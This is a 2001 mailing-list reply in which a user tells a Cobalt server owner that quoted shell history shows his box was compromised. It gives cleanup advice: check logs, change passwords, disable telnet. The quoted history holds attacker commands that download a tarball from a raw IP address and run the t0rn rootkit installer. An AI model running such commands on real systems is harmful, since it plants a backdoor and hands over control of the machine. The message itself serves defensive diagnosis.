[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-users] access problem solved.
- Subject: Re: [cobalt-users] access problem solved.
- From: "Carrie Bartkowiak" <ravencarrie@xxxxxxxx>
- Date: Tue Jun 26 20:44:02 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
> seem smore like our admin guy installing stuff that has caused the
prob rather
> than a hack attack.
> wget ftp://65.33.193.89/pub/tk.tar.gz
> tar -vzxf tk.tar.gz
> cd tk
> ./t0rn 52F32678 14780
> rewt
> exit
Umm - hey Gerald, if your 'admin guy' is installing a t0rn rootkit on
your server, then you need to fire his ass - your box has been hacked.
Someone got in, installed SSH2 so they'd have a way to get into the
machine - I really *don't* think that this was your admin guy - note
how he uses ftp to get the 'wget' package first to make it easier to
download the other packages. Wget is already installed on the Cobalts
and your admin guy would know this.
Then whoever it was installed the t0rn rootkit, which turned off ftp
and telnet access so that only *he* could get into the machine via
SSH2.
You've been hacked. Check your last log (by doing "last | less" from
the command line, no quotes) to see if he left that intact so you can
see who he logged in as.
Let me repeat - YOU'VE BEEN HACKED.
I'm glad you got your access back, but now it's time to do some
clean-up; and the first order of business is to change ALL passwords
and turn off that damn telnet - I'd be willing to bet that's how he
got in (and subsequently why he turned it off; so that no one else
could get in that way). If you need a free SSH2 client, check out
Putty (just do a search on Google for Putty).
My condolences, Gerald.
CarrieB